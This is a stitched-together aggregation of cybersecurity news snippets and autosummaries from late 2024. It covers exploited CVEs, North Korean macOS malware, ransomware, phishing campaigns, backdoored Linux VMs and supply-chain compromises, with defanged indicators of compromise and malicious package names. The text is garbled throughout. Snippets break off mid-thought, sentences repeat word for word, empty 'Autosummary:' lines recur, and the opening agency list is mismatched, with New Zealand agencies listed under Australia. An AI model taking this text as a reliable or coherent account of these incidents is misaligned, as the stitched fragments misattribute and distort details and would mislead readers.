Summary The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies): United States: The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and National Security Agency (NSA) The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and National Security Agency (NSA) Australia: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ) United Kingdom: National Cyber Security Centre (NCSC-UK) This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). "Autosummary:
Indicators of Compromise Fake pages e-bays-24x7support-number[.]vercel[.]app developer[.]ebay[.]com e-bay24x7pluscaresupport[.]bitbucket[.]io upbay[.]online e-bay24x7customer[.]casterins[.]online e-bay24x7-customers-services-assist[.]onrender[.]com Fraudulent phone numbers 1[-]866[-]409[-]9281 1[-]833[-]714[-]3970 1[-]805[-]372[-]1369 Flurry of ads A search for ‘ebay phone number‘ or ‘ebay customer service‘ from the U.S. using Google Chrome returned several ads that were entirely fraudulent. "Cisco has fixed a critical command injection vulnerability (CVE-2024-20418) affecting its Ultra-Reliable Wireless Backhaul (URWB) Access Points that can be exploited via a HTTP requests and allows complete compromise of the devices. There are no workarounds to address this flaw, though vulnerable access points can be protected by switching off URWB mode, the company shared in the advisory. The good news is that the vulnerability was discovered by a Cisco employee during internal security testing … More
The post Critical vulnerability in Cisco industrial wireless access points fixed (CVE-2024-20418) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"A recent spear-phishing campaign targeting industrial and engineering companies in Europe was aimed at saddling victims with the popular GuLoader downloader and, ultimately, a remote access trojan that would permit attackers to steal information from and access compromised computers whenever they wish. “The emails are sent from various email addresses including from fake companies and compromised accounts. The emails typically hijack an existing email thread or request information about an order,” Tara Gould, Threat Research … More
The post Industrial companies in Europe targeted with GuLoader appeared first on Help Net Security.
"Autosummary:
This allows malicious code to be run through a legitimate process, meaning security products may not detect the malware, or victims may not be alerted since the process will look like a normal Windows process,” Gould told Help Net Security. "North Korean hackers are targeting crypto-related businesses with phishing emails and novel macOS-specific malware. The crypto-related phishing campaign Since July 2024, phishing emails seemingly containing helpful information on risks related to the rise of the price of Bitcoin have been sent to intended victims in cryptocurrency-related industries, SentinelLabs researchers have found. The phishing email (Source: SentinelLabs) The email urges the recipient to click on the “Open” button to download a PDF file, but doing that … More
The post North Korean hackers employ new tactics to compromise crypto-related businesses appeared first on Help Net Security.
"Autosummary:
“We might speculate that heightened attention on previous [Democratic People’s Republic of Korea] campaigns could have reduced the effectiveness of previous ‘social media grooming’ attempts, perhaps as a result of intended targets in DeFi, ETF and other crypto-related industries becoming more wary, but it is equally likely that such state-backed threat actors have sufficient resources to pursue multiple strategies simultaneously,” the researchers noted.In the case of this malware, the commands launch the backdoor written to disk earlier by the stage-one dropper,” Stokes told Help Net Security, and added that if the backdoor has been removed, the persistence mechanism will not be able to reinstall it. "Autosummary:
Cybersecurity company SentinelOne, which dubbed the campaign Hidden Risk, attributed it with high confidence to BlueNoroff, which has been previously linked to malware families such as RustBucket, KANDYKORN, ObjCShellz, RustDoor (aka Thiefbucket), and TodoSwift. The application, written in the Swift programming language, has been found to be signed and notarized on October 19, 2024, with the Apple developer ID "Avantis Regtech Private Limited (2S8XHJ7948)." "Autosummary:
Simply upload a file or URL to start the analysis process Threat detection takes less than 60 seconds The service quickly extracts deep insights into malware behavior and generates threat reports Type, open links, download attachments, run programs all inside the VM Use private analysis mode and team collaboration tools Integrate ANY.RUN"s sandbox into your organization"s workflow with a 14-day free trial to try everything it has to offer. By using Registry Run Keys and the Startup Folder, attackers can maintain long-term persistence, allowing them to continue their malicious activities, such as data exfiltration, lateral movement within a network, or further exploitation of the system. Try fast malware analysis with ANY.RUN Request a 14-day free trial Modification of Registry Run Keys (T1547.001) To ensure that the malicious software runs automatically whenever a system starts, attackers add entries to specific registry keys that are designed to launch programs at startup. "Autosummary:
The campaign, dating back to February 2023, has claimed victims across the world, particularly those located in Brazil, China, Russia, Mexico, UAE, Egypt, Algeria, Vietnam, India, and Sri Lanka." The miner, for its part, is downloaded from a GitHub repository, with the malware also initiating contact with a remote server over TLS version 1.3 to exfiltrate sensitive data from web browsers, such as cookies, credit card data, browsing history, and visited places, system metadata, installed software, and timezone, among others. "Autosummary:
Canada ordered ByteDance to shut down TikTok operations in the country over security concerns Pierluigi Paganini November 07, 2024 November 07, 2024 Canada ordered ByteDance to shut down TikTok operations over security concerns but did not issue a full ban on the platform. "Autosummary:
Critical bug in Cisco UWRB access points allows attackers to run commands as root Pierluigi Paganini November 07, 2024 November 07, 2024 Cisco fixed a critical flaw in URWB access points, allowing attackers to run root commands, compromising industrial wireless automation security. "Autosummary:
They will continue to enjoy our streamlined, integrated user experience, and our no-log service will never track, store, or share any user network data. "Malwarebytes announced the acquisition of AzireVPN, a renowned privacy-focused VPN provider. Malwarebytes has long been a defender of user privacy through its portfolio of consumer solutions, including Malwarebytes Privacy VPN and its free ad and scam blocker web extension Malwarebytes Browser Guard. This acquisition further supports the company’s mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet. … More
The post Malwarebytes acquires AzireVPN to boost security for customers appeared first on Help Net Security.
"Autosummary:
“Malwarebytes is a fierce advocate for privacy, and this acquisition reinforces our dedication to driving innovation that protects a free and open internet,” said Marcin Kleczynski, CEO, Malwarebytes. "Autosummary:
"Autosummary:
DPRK-linked BlueNoroff used macOS malware with novel persistence Pierluigi Paganini November 07, 2024 November 07, 2024 SentinelLabs observed North Korea-linked threat actor BlueNoroff targeting businesses in the crypto industry with a new multi-stage malware. The initial attack vector is a phishing email containing a link to a malicious application disguised as a link to a PDF document relating to a cryptocurrency topic such as “Hidden Risk Behind New Surge of Bitcoin Price”, “Altcoin Season 2.0-The Hidden Gems to Watch” and “New Era for Stablecoins and DeFi, CeFi”. "Autosummary:
"Autosummary:
Malicious zshenv file Source: SentinelLabs The malware installs a hidden "touch file" in the /tmp/ directory to mark successful infection and persistence, ensuring the payload remains active across reboots and user sessions. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-43093 Android Framework Privilege Escalation Vulnerability CVE-2024-51567 CyberPanel Incorrect Default Permissions Vulnerability CVE-2019-16278 Nostromo nhttpd Directory Traversal Vulnerability CVE-2024-5910 Palo Alto Expedition Missing Authentication Vulnerability CVE-2024-43093 – this week, Google warned that the vulnerability CVE-2024-43093 in the Android OS is actively exploited in the wild. "In this Help Net Security video, Chris Gibson, CEO at FIRST, discusses the evolving threat landscape and provides a unique take on where data breaches and cyber attacks will be in 2025.
The post Key cybersecurity predictions for 2025 appeared first on Help Net Security.
"Autosummary:
"Identity-related data breaches are more severe and costly than run-of-the-mill incidents, according to RSA. 40% of respondents reported an identity-related security breach. Of those, 66% reported it as a severe event that affected their organization. 44% estimated that the total costs of identity-related data breaches exceeded the cost of a typical data breach. These findings underscore why organizations should prioritize investing in security capabilities that can mitigate the high costs of identity-related breaches. AI seen … More
The post Identity-related data breaches cost more than average incidents appeared first on Help Net Security.
"Autosummary:
By sector, agriculture and aerospace estimated that identity-related data breaches tended to cost them the most, with 50% and 43% of respondents noting that breaches had cost them more than $10,000,000 (respectively). "In this Help Net Security interview, Julie Madhusoodanan, Head of CyberSecurity at LinkedIn, discusses how closing the gender gap could enhance cybersecurity’s effectiveness in combating emerging threats. With women still underrepresented in cybersecurity roles, she emphasizes how diverse teams bring essential skills and innovative perspectives. Madhusoodanan outlines strategies like inclusive hiring, mentorship, and flexible work policies as essential steps to foster gender balance in the field. What impact would closing the gender gap in cybersecurity … More
The post The cybersecurity gender gap: How diverse teams improve threat response appeared first on Help Net Security.
"Autosummary:
Ultimately, closing the gender gap will require a multi-pronged approach, including educational reforms to promote inclusive access to cybersecurity (and STEM) education, targeted training programs for women, highlighting female role models in cybersecurity, and more. These initiatives offer women guidance, support, and networking opportunities, which are key for navigating career paths in a male-dominated field. Upskilling and career growth; training and mentorship schemes, especially in pre- and middle-management roles Factoring in gender when up-skilling for AI; as the workplace is transformed, ensuring training is handled in a fair and equitable way. "A new ransomware dubbed GoZone is being leveraged by attackers that don’t seem to be very greedy: they are asking the victims to pay just $1,000 in Bitcoin if they want their files decrypted. The GoZone HTML ransom note (Source: SonicWall) The ransom notes shown by the malware lay out another incentive for paying up: they claim that child sexual abuse material has been found on the targeted computer and urge the victim to pay … More
The post GoZone ransomware accuses and threatens victims appeared first on Help Net Security.
"Autosummary:
"Symbiotic Security launched a real-time security for software development that combines detection and remediation with just-in-time training – incorporating security testing and training directly into the development process without breaking developers’ workflows. Backed with $3 million of seed funding from investors including Lerer Hippeau, Axeleo Capital, Factorial Capital, and others, the company has introduced its software-as-a-service that works with the developer’s Integrated Development Environment (IDE) and enables them to develop software more securely. A Ponemon … More
The post Symbiotic provides developers with real-time feedback on potential security vulnerabilities appeared first on Help Net Security.
"Autosummary:
“Traditional approaches to code security are broken, which we fix by integrating security at the time code is written,” said Jerome Robert, CEO, Symbiotic Security. "Autosummary:
For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device. "Autosummary:
"Autosummary:
"Autosummary:
Based on Kaspersky"s visibility, the malware compromises systems in Brazil, China, Russia, Mexico, UAE, Egypt, Algeria, Vietnam, India, and Sri Lanka. "Autosummary:
"Autosummary:
"Leveraging Microsoft SaaS services — including Teams, SharePoint, Quick Assist, and OneDrive — the attacker exploited the trusted infrastructures of previously compromised organizations to distribute spear-phishing attacks and store malware," Israeli cybersecurity company Hunters said in a new report. "Autosummary:
Read more: https://t.co/onRsd2ZfF2 pic.twitter.com/qenqRNZrrF — Comparitech (@Comparitech) November 5, 2024 The Embargo ransomware gang has been active since April 2024, it runs a ransomware-as-a-service model and has claimed eight attacks, including another two attacks on U.S. healthcare providers, NorthBay Healthcare and Weiser Memorial Hospital. "Autosummary:
Complete Winos4.0 attack chain Source: Fortinet Winos4.0 checks for a variety of security tools on the system, including Kaspersky, Avast, Avira, Symantec, Bitdefender, Dr.Web, Malwarebytes, McAfee, AhnLab, ESET, Panda Security, and the now discontinued Microsoft Security Essentials. "Autosummary:
"Application Security Engineer MassMutual | USA | Hybrid – View job details As an Application Security Engineer, you will conduct in-depth security assessments, including vulnerability scanning, and code reviews. Ensure secure coding practices are followed, and security controls are incorporated into software designs. Conduct detailed threat modeling to identify attack vectors and potential weaknesses. Ensure compliance with security regulations, frameworks, and industry standards such as OWASP. Cybersecurity Engineer, Resilience Electrolux Group | Italy | On-site … More
The post Cybersecurity jobs available right now: November 5, 2024 appeared first on Help Net Security.
"Autosummary:
Offensive Security Engineer Cyberbit | Israel | On-site – View job details As an Offensive Security Engineer, you will design, build, and implement red team labs, vulnerable websites, CTF challenges, and exercises tailored for varying skill levels, covering offensive security concepts, AWS-based infrastructure, and Docker deployments. Senior Threat Detection and Validation Engineer dunnhumby | United Kingdom | Hybrid – View job details As a Senior Threat Detection and Validation Engineer, you will conduct periodic validation testing (including, but not limited to, atomic testing, breach and attack simulations, adversary simulation exercises, purple teaming, tabletops, and penetration testing) to validate the effectiveness or identify security gaps and vulnerabilities in the organization’s security controls. Senior Penetration Tester emaratech | UAE | On-site – View job details As a Senior Penetration Tester, you will perform in-depth penetration tests on web applications, mobile applications (iOS and Android), network infrastructure (web server, DB, Firewall, wireless access points), and cloud environments. Senior Manager, Security Architecture Ontario Power Generation | Canada | On-Site – View job details As a Senior Manager, Security Architecture, you will provide leadership for the development of the security strategy and contribute to the delivery of critical cyber security projects across Cloud, IT and OT to improve overall security capabilities, maturity, and risk posture. "Autosummary:
"Autosummary:
The individual in question, Alexander "Connor" Moucka (aka Judische and Waifu), was apprehended on October 30, 2024, on the basis of a provisional arrest warrant, following a request by the U.S. The development was first reported by Bloomberg and corroborated by 404 Media. "Google has delivered fixes for two vulnerabilities endangering Android users that “may be under limited, targeted exploitation”: CVE-2024-43047, a flaw affecting Qualcomm chipsets, and CVE-2024-43093, a vulnerability in the Google Play framework. The exploited vulnerabilities (CVE-2024-43047, CVE-2024-43093) Qualcomm patched CVE-2024-43047 – a use-after-free vulnerability in the Digital Signal Processor (DSP) service that could be exploited to escalate privileges on targeted devices – in October 2024, and urged original equipment manufacturers (OEMs) to deploy the patches … More
The post Google patches actively exploited Android vulnerability (CVE-2024-43093) appeared first on Help Net Security.
"Autosummary:
"In this study, GitGuardian and CyberArk reveal the stark reality of secrets management across 1,000 organizations. With 79% experiencing secrets leaks and an average remediation time of 27 days, the findings expose critical gaps between security confidence and reality. Learn how leading organizations tackle the secrets sprawl crisis and what sets successful security programs apart from the rest. Get actionable insights into modernizing your secrets security strategy for today’s cloud-native world. Download the Voice of … More
The post Report: Voice of Practitioners 2024 – The True State of Secrets Security appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Android flaw CVE-2024-43093 may be under limited, targeted exploitation Pierluigi Paganini November 05, 2024 November 05, 2024 Google warned that a vulnerability, tracked as CVE-2024-43093, in the Android OS is actively exploited in the wild. "Autosummary:
"Influence actors linked to Russia, in particular, are manufacturing videos and creating fake articles to undermine the legitimacy of the election, instill fear in voters regarding the election process, and suggest Americans are using violence against each other due to political preferences, judging from information available to the IC," describes CISA. "Autosummary:
The first level addresses core Android vulnerabilities, with 17 issues this time, while the second patch level encompasses those plus vendor-specific fixes (Qualcomm, MediaTek, etc.), counting an additional 34 fixes this month. "Unknown attackers are trying to trick Windows users into spinning up a custom Linux virtual machine (VM) with a pre-configured backdoor, Securonix researchers have discovered. The campaign The attack began with a phishing email, they believe, but they weren’t able to pinpoint the intendend victims. The email included a link pointing to an unusually big ZIP file (285 MB), and its name – OneAmerica Survey.zip – points to the likely lure: a survey by OneAmerica … More
The post Beware of phishing emails delivering backdoored Linux VMs! appeared first on Help Net Security.
"Autosummary:
If the user clicks on the shortcut file, a process is started wherein: The ZIP file is “unzipped” and its contents put into the user’s profile directory into a directory called “datax” A batch processing (BAT) file is executed and it shows a decoy image saying there was an “Internal Server Error” while, in the background, a (renamed) QEMU process and command line is executed to start the emulated Tiny Core Linux environment The customized Linux VM is meant to be used to create an interactive shell (essentially, a backdoor) on the host machine by initiating an SSH connection, through which the attackers can: "Autosummary:
A majority of the compromises have been reported in Italy (56.8%), followed by Portugal (18.7%), Hong Kong (4.6%), Spain (3.9%), and Peru (3.4%), marking a rare instance of a Chinese threat actor orchestrating a fraudulent scheme to target retail banking users in Europe and Latin America. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-8957 PTZOptics PT30X-SDI/NDI Cameras OS Command Injection Vulnerability CVE-2024-8956 PTZOptics PT30X-SDI/NDI Cameras Authentication Bypass Vulnerability Threat actors are attempting to exploit the two zero-day vulnerabilities CVE-2024-8956 and CVE-2024-8957 in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GretNoise researchers warned last week. "Autosummary:
"Autosummary:
“According to its source code, ToxicPanda is in an early stage of development, with some commands appearing as placeholders without a real implementati” ToxicPanda, similar to other banking trojans like Medusa, BingoMod, and Copybara, uses a manual approach allowing attackers target any bank customer, requiring less technical skill, and helping them to bypass banks’ behavioral detection defenses.Though still in early development, with incomplete code elements, ToxicPanda has infected thousands of devices across Italy, Portugal, Spain, and Latin America, targeting 16 banks. "The IRISSCERT Cyber Crime Conference (IRISSCON) returns on November 6th at the Aviva Stadium, where global cybersecurity leaders will explore AI’s revolutionary role in defending against and contributing to cyber threats. As Ireland’s longest-standing cybersecurity conference, IRISSCON 2024 will dive into AI’s impact on how it both enhances security and enables cybercriminals to scale and automate attacks. With generous support from diamond sponsors ESET, Symantec, and BH Consulting, the event will highlight cutting-edge AI strategies … More
The post IRISSCON 2024 to address AI’s dual impact on cybersecurity appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security interview, Rachel Barouch, an Organizational Coach for VCs and startups and a former VP HR in both a VC and a Cybersecurity startup, discusses the dynamics of cybersecurity researchers and team-building strategies. She highlights that these researchers, often brilliant and introverted, come with distinctive working styles, making it challenging to foster collaboration. However, with the right approach to assessing, managing, retaining and developing them, organizations can unlock their potential and … More
The post Hiring guide: Key skills for cybersecurity researchers appeared first on Help Net Security.
"Autosummary:
However, with the right approach to assessing, managing, retaining and developing them, organizations can unlock their potential and drive high-performance teams, ultimately boosting the startup’s market value, especially in the context of mergers and acquisitions (M&As).Programming expertise, particularly in languages like Python, C/C++, and assembly, combined with deep knowledge of operating system internals, is crucial. "In this Help Net Security video, James Edgar, CISO at Corpay, reveals insights into cybersecurity health, concerns, challenges, and other considerations for building a solid defense program. Key insights revealed in Corpay’s 2024 State of Business Cybersecurity Report: 67% of respondents blame lack of capital resources for preventing companies from reaching their desired level of cyber protection. 61% of respondents plan to test or implement AI tools for cybersecurity purposes in the next 12 months. … More
The post Cybersecurity in crisis: Are we ready for what’s coming? appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The names of the malicious package names, i.e., dropper apps, bearing the malware are listed below - com.qaz123789.serviceone com.sbbqcfnvd.skgkkvba com.securegroup.assistant com.seplatmsm.skfplzbh eugmx.xjrhry.eroreqxo gqcvctl.msthh.swxgkyv ouyudz.wqrecg.blxal plnfexcq.fehlwuggm.kyxvb xkeqoi.iochvm.vmyab Like other Android banking malware families that are known to abuse accessibility services APIs to seize control of the devices and perform malicious actions, FakeCall uses it to capture information displayed on the screen and grant itself additional permissions as required. "Autosummary:
Key steps include evaluating traffic risks, identifying entry points, blocking outdated user agents, limiting proxies, implementing rate limiting, and monitoring for signs of automation or headless browsers. DDoS Attacks Remain a Persistent Threat Distributed Denial-of-Service (DDoS) attacks are nearly as common as business logic abuse, representing 30.6% of AI-driven threats to retailers — and they are becoming progressively more prominent. The financial impact of a successful DDoS attack can be staggering, with businesses facing revenue loss, increased recovery costs, and potential long-term damage to their brand reputation. "Autosummary:
"Autosummary:
Start.bat batch file installing the QEMU Linux virtual machine Source: BleepingComputer While the virtual machine is being installed, the same batch file will display a PNG file downloaded from a remote site that shows a fake server error as a decoy, implying a broken link to the survey. "Autosummary:
"The information involved in the Incident may have included your personal information, such as your first and last name, date of birth, address, bank account information, driver"s license(s), Social Security number, and other identifying information concerning you and/or your interactions with the City," the breach notification letters reveal. "Autosummary:
️🔥 Trending CVEs CVE-2024-50550, CVE-2024-7474, CVE-2024-7475, CVE-2024-5982, CVE-2024-10386, CVE-2023-6943, CVE-2023-2060, CVE-2024-45274, CVE-2024-45275, CVE-2024-51774 📰 Around the Cyber World Security Flaws in PTZ Cameras: Threat actors are attempting to exploit two zero-day vulnerabilities in pan-tilt-zoom (PTZ) live streaming cameras used in industrial, healthcare, business conferences, government, religious places, and courtroom settings. Threat actors are attempting to exploit two zero-day vulnerabilities in pan-tilt-zoom (PTZ) live streaming cameras used in industrial, healthcare, business conferences, government, religious places, and courtroom settings.Affected cameras use VHD PTZ camera firmware < 6.3.40, which is found in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63.Affected cameras use VHD PTZ camera firmware < 6.3.40, which is found in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. Nearly a dozen flaws have been disclosed in OpenText NetIQ iManager, an enterprise directory management tool, some of which could be chained together by an attacker to achieve pre-authentication remote code execution, or allow an adversary with valid credentials to escalate their privileges within the platform and ultimately achieve post-authenticated code execution.Multiple Vulnerabilities in OpenText NetIQ iManager: Nearly a dozen flaws have been disclosed in OpenText NetIQ iManager, an enterprise directory management tool, some of which could be chained together by an attacker to achieve pre-authentication remote code execution, or allow an adversary with valid credentials to escalate their privileges within the platform and ultimately achieve post-authenticated code execution." Funnull, the Chinese company that acquired Polyfill[.]io JavaScript library earlier this year, has been linked to investment scams, fake trading apps, and suspect gambling networks. "Autosummary:
Nigerian man Sentenced to 26+ years in real estate phishing scams Pierluigi Paganini November 04, 2024 November 04, 2024 Nigerian Kolade Ojelade gets 26 years in U.S. for phishing scams that stole millions by hacking email accounts. "Autosummary:
At the end of October, the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) released the following statement: “The IC assesses that Russian actors manufactured and amplified a recent video that falsely depicted an individual ripping up ballots in Pennsylvania, judging from information available to the IC and prior activities of other Russian influence actors, including videos and other disinformation activities. "Autosummary:
Additionally, manual checks for /lib/libsophos.so, /tmp/.sshd.ipc, /tmp/.fgmon_cli.ipc, /var/run/sshd.pid, and /var/run/goat.pid, can reveal an infection. "Autosummary:
According to the official statement, the ransomware group was also able to view and access certain sensitive personal information, which may have included first and last name, date of birth, address, bank account information, City employee account number and position, City employment and payroll records, Social Security Number (SSN), and other identifying information. The City Auditor’s Office examines City operations to identify an opportunity to reduce costs, increase efficiency, quality and effectiveness, or otherwise improve management of a city function, program, service or policy. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
Indicators of Compromise Cloaking domains ixx-kexxx[.]com Phishing domains xxx-ii-news[.]net xxx-ii-news[.]com ixxx-blognew[.]com xxx-ii-news[.]net new-bllog-i[.]com info-blog-news[.]com xv-bloging-info[.]com xxx-new-videos[.]com Hosting server 200.107.207[.]232This is because of the built-in anti-phishing heuristic rules which intercept the connection and display a warning message: If you suspect your banking information has already been stolen, try to take action as quickly as possible by contacting your financial institution(s) and resetting all your passwords (especially if you reused any of them for different websites). Bypassing multi factor authentication In some phishing campaigns, criminals are notified in real time when a new victim attempts to login into their fraudulent page. "Autosummary:
“The information involved in the Incident may have included your personal information, such as your first and last name, date of birth, address, bank account information, driver’s license(s), Social Security number, and other identifying information concerning you and/or your interactions with the City.” "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Patching problems: The “return” of a Windows Themes spoofing vulnerability Despite two patching attempts, a security issue that may allow attackers to compromise Windows user’s NTLM (authentication) credentials via a malicious Windows themes file still affects Microsoft’s operating system, 0patch researchers have discovered. Black Basta operators phish employees via Microsoft Teams Black Basta ransomware affiliates are still trying to trick … More
The post Week in review: Windows Themes spoofing bug “returns”, employees phished via Microsoft Teams appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: October 2024 Here’s a look at the most interesting products from the past month, featuring releases from: Action1, Balbix, BreachLock, Commvault, Dashlane, Data Theorem, Edgio, ExtraHop, Fastly, Frontegg, GitGuardian, IBM, Ivanti, Jumio, Kusari, Legit Security, Metomic, Nametag, Neon, Nucleus Security, Okta, Qualys, Rubrik, SAFE Security, Sectigo, Securiti, Veeam Software, and XM Cyber. Simplifying decentralized identity systems for everyday use In this Help Net Security interview, Carla Roncato, VP of Identity at WatchGuard Technologies, discusses how companies can balance privacy, security, and usability in digital identity systems. "Autosummary:
"Autosummary:
Scam types and success rate Source: Arxiv.org OpenAI"s response OpenAI told BleepingComputer that its latest model, o1 (currently in preview), which supports "advanced reasoning," was built with better defenses against this kind of abuse. Study findings The researcher"s paper explores various scams like bank transfers, gift card exfiltration, crypto transfers, and credential stealing for social media or Gmail accounts. "Autosummary:
interlock.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=c7f876806bf4d3ccafbf2252e77c2a7546c301e6, for FreeBSD 10.4, FreeBSD-style, not stripped However, even when testing the sample on a FreeBSD virtual machine, BleepingComputer was unable to get the sample to properly execute. "Autosummary:
Specifically, the attacker used a batch script ("hrword install.bat") to install Huorong Antivirus on the system, set up a custom service ("sysdiag"), execute a driver ("sysdiag_win10.sys"), and run "HRSword.exe" using a VBS script. "Autosummary:
PTZOptics cameras zero-days actively exploited in the wild Pierluigi Paganini November 02, 2024 November 02, 2024 Hackers are exploiting two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics cameras. "Autosummary:
"Security debt, defined for this report as flaws that remain unfixed for longer than a year, exists in 76% of organizations in the financial services sector, with 50% of organizations carrying critical security debt, according to Veracode. Financial sector apps accumulate more security debt With the average cost of a data breach in the financial industry estimated to be $6.08 million, the research comes at a critical time for one of the most highly targeted … More
The post 50% of financial orgs have high-severity security flaws in their apps appeared first on Help Net Security.
"Autosummary:
Security debt, defined for this report as flaws that remain unfixed for longer than a year, exists in 76% of organizations in the financial services sector, with 50% of organizations carrying critical security debt, according to Veracode. "OpenPaX is an open-source kernel patch that mitigates common memory safety errors, re-hardening systems against application-level memory safety attacks using a simple Linux kernel patch. It’s available under the same GPLv2 license terms as the Linux kernel. “We are pleased to be able to bring this to the industry at large and as an integrated offering for our customers with Edera Protect,” said Ariadne Conill, distinguished engineer at Edera and maintainer of Alpine Linux. “Until … More
The post OpenPaX: Open-source kernel patch that mitigates memory safety errors appeared first on Help Net Security.
"Autosummary:
"Although most organizations use emails with built-in security features that filter out suspicious messages, criminals always find a way to bypass these systems. With the development of AI technology, phishing is becoming increasingly difficult to recognize, allowing them to circumvent security measures. While most attempts do not succeed, it only takes one to cause significant damage to a company’s operations. Mick Leach, Field CISO at Abnormal Security, discusses why the automotive industry is the new … More
The post Threat actors are stepping up their tactics to bypass email protections appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Gain practical strategies for identifying and responding to suspicious activity across identity providers, cloud platforms, and SaaS applications. "Autosummary:
Netcraft said more than 2,000 phishing websites have been identified the kit, known as Xiū gǒu, with the offering used in attacks aimed at a variety of verticals, such as public sectors, postal, digital services, and banking services. "Autosummary:
"Storm-0940 is known to target organizations in North America and Europe, including think tanks, government organizations, non-governmental organizations, law firms, defense industrial base, and others. "Autosummary:
" Synology says it addressed the vulnerabilities in the following software releases; however, they"re not automatically applied on vulnerable systems, and customers are advised to update as soon as possible to block potential incoming attacks: BeePhotos for BeeStation OS 1.1: Upgrade to 1.1.0-10053 or above BeePhotos for BeeStation OS 1.0: Upgrade to 1.0.2-10026 or above Synology Photos 1.7 for DSM 7.2: Upgrade to 1.7.0-0795 or above. "Autosummary:
Before encrypting devices on the breached network on December 31, 2022, the attackers had access to HACLA members" sensitive personal information, including (but not limited to) names, social security numbers, contact information, driver"s licenses, credit card and financial account numbers, as well as their health insurance and medical information. "Autosummary:
"Yet again, connected devices are in the news for all the wrong reasons. In October, security researchers found that robot vacuums from Chinese company, Ecovacs, can be compromised via a backdoor. In one case, hackers gained control over the device and shouted slurs at the homeowners. Worse still: the company doesn’t take responsibility and tells users they “do not need to worry excessively” about the vulnerability. This hack is another unfortunate example of connected device … More
The post IoT needs more respect for its consumers, creations, and itself appeared first on Help Net Security.
"Autosummary:
But the implications are far more sinister – these always-connected, sensor-equipped devices could be used to eavesdrop on private conversations, stalk targets, or even conduct corporate intelligence gathering by scanning homes for products and brands.And yet, despite multiple high-profile stories, poor products with lax security are concerningly common, a clear danger with cameras and microphones in the mix.The smart home and office are, in essence, our personal and professional lives, and I’m certainly not comfortable with companies playing fast and loose with cybersecurity standards. "Autosummary:
However, a successful exploitation banks on the following plugin configuration - Crawler -> General Settings -> Crawler: ON Crawler -> General Settings -> Run Duration: 2500 – 4000 Crawler -> General Settings -> Interval Between Runs: 2500 – 4000 Crawler -> General Settings -> Server Load Limit: 0 Crawler -> Simulation Settings -> Role Simulation: 1 (ID of user with administrator role) "Sophos conducted defensive and counter-offensive operation over the last five years with multiple interlinked nation-state adversaries based in China targeting perimeter devices, including Sophos Firewalls. Espionage campaigns tied to Chinese hacking groups The attackers used a series of campaigns with novel exploits and customized malware to embed tools to conduct surveillance, sabotage and cyberespionage as well as overlapping tactics, tools and procedures (TTPs) with well-known Chinese nation-state groups including Volt Typhoon, APT31 and APT41. The … More
The post Sophos mounted counter-offensive operation to foil Chinese attackers appeared first on Help Net Security.
"Autosummary:
Minimize internet-facing services and devices when possible Prioritize patching with urgency for internet-facing devices and monitor these devices Enable hotfixes for edge devices to be allowed and applied automatically Collaborate with law enforcement, public-private partners, and government to share and act on relevant IoCs Create a plan for how your organization deals with EOL devices “We need to work collaboratively across the public and private sector, law enforcement and governments, and the security industry, to share what we know about these adversarial operations. While they released details starting in 2020 on the campaigns associated, including Cloud Snooper and Asnarök, the company is sharing the overall investigation analysis to raise awareness of the persistence of Chinese nation-state adversaries and their hyperfocus to compromise perimeter, unpatched and end-of-life (EOL) devices, often via zero-day exploits they are creating for those devices.The adversaries targeted both small and large critical infrastructure and government targets, primarily located in South and South-East Asia, including nuclear energy suppliers, a national capital’s airport, a military hospital, state security apparatus, and central government ministries. "A supply chain compromise involving Lottie Player, a widely used web component for playing site and app animations, has made popular decentralized finance apps show pop-ups urging users to connect their wallets, TradingView has reported. The pop-up (Source: Lottie Player GitHub repository) Users who did it – and it seems that there was at least one victim – had their wallets drained. The Lottie Player compromise Website admins began complaining about the pop-up and asking … More
The post Lottie Player supply chain compromise: Sites, apps showing crypto scam pop-ups appeared first on Help Net Security.
"Autosummary:
"North Korean state-sponsored hackers – Jumpy Pisces, aka Andariel, aka Onyx Sleet – have been spotted burrowing into enterprise systems, then seemingly handing matters over to the Play ransomware group. Timeline of the attack (Source: Palo Alto Networks) The attack The ransomware attack was investigated by Palo Alto Networks’ Unit 42 in September 2024, and they determined that North Korean hackers: Gained access to a host using a compromised users account Moved laterally to other … More
The post North Korean hackers pave the way for Play ransomware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Later, GreyNoise discovered that at least two newer models, PT20X-SE-NDI-G3, and PT30X-SE-NDI-G3, which also didn"t receive a patch, were impacted too. "Autosummary:
"Autosummary:
